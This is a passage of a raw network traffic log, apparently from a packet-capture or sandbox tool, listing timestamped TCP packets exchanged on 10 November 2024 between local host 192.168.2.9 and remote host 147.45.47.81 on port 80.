                                                                                                                                                                                Nov 10, 2024 09:18:27.474196911 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474209070 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474220037 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474265099 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.474368095 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474379063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474394083 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474421978 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.474442959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474456072 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474493027 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.474493027 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.474570036 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474581003 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474623919 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.474898100 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474917889 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474927902 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474957943 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.474972963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474984884 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.474997044 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475028992 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.475045919 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.475209951 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475265026 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475277901 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475291014 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475337982 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.475346088 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.475354910 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475367069 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475383043 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475409031 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475420952 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475420952 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.475436926 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475445986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475452900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475470066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475502014 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.475661039 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475713015 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475724936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475756884 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.475776911 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475786924 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.475792885 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475805044 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475816965 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475828886 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475842953 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.475848913 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.475861073 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475873947 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475884914 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475913048 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.475924969 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475927114 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.475935936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.475975037 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.475989103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.476000071 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.476016045 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.476031065 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.476042032 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.476089954 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.476102114 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.476113081 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.476150990 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.476155996 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.476155996 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.476164103 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.476176023 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.476190090 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.476224899 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.533643961 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533689022 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533703089 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533715963 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533729076 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533785105 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.533785105 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.533827066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533850908 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533864021 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533881903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533895016 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533905029 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.533905029 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.533906937 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533929110 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533938885 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.533940077 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533953905 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533966064 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533978939 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.533993006 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.534007072 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.534024954 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.589481115 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.589493990 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.589504957 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.589517117 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.589550018 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.589565039 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.589577913 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.589591026 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.589629889 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.589711905 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.589771986 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.589785099 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.589813948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.589819908 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.589828014 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.589839935 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.589855909 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.589859962 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.589875937 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.589884996 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.589900017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.589936972 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.590035915 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590050936 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590092897 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.590106010 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590116978 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590148926 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.590176105 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590194941 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590208054 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590219975 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.590246916 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.590542078 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590575933 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590586901 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590614080 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.590616941 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590631962 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590666056 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590667963 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.590682983 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590708971 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.590759993 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590789080 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590802908 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590826035 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.590857029 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.590871096 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590883017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590893030 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.590928078 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.591099024 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591154099 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.591166019 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591177940 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591211081 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.591217995 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591229916 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591240883 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591252089 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591269970 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.591288090 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.591321945 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591331959 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591362000 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591376066 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591387987 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591402054 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591403008 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.591413975 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591427088 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591430902 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.591438055 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.591470003 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.591542006 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591593027 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591607094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591641903 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.591666937 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591680050 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591700077 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591706991 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591711998 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591717005 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591717958 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.591727972 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591742039 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591744900 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.591766119 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.591780901 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591792107 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591801882 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591815948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591829062 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.591851950 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.591952085 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591964006 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.591979980 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.592001915 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.592011929 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.649174929 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.649241924 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.649252892 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.649265051 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.649280071 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.649291992 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.649293900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.649306059 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.649307966 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.649326086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.649339914 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.649343014 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.649362087 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.649373055 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.649375916 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.649388075 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.649399042 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.649424076 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.649511099 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.649523973 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.649537086 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.649564028 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.699059010 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.705112934 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.705125093 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.705148935 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.705159903 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.705166101 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.705197096 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.705972910 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706109047 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706124067 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706136942 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706154108 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706155062 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706168890 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706171989 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706178904 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706192017 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706203938 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706216097 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706217051 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706228018 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706239939 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706253052 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706259966 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706264973 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706283092 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706305981 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706307888 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706319094 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706322908 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706332922 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706346035 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706357002 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706358910 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706376076 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706384897 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706387997 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706402063 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706412077 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706425905 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706448078 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706456900 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706468105 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706480026 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706494093 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706506014 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706506968 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706525087 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706527948 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706548929 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706588030 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706598997 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706610918 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706629992 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706656933 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706736088 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706754923 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706768990 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706784010 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706789017 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706816912 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706828117 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706835032 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706849098 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706861019 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706886053 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706907988 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.706948996 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.706965923 CET8049833147.45.47.81192.168.2.9
                                                                                                                                                                                Nov 10, 2024 09:18:27.707004070 CET4983380192.168.2.9147.45.47.81
                                                                                                                                                                                Nov 10, 2024 09:18:27.707277060 CET8049833147.45.47.81192.168.2.9
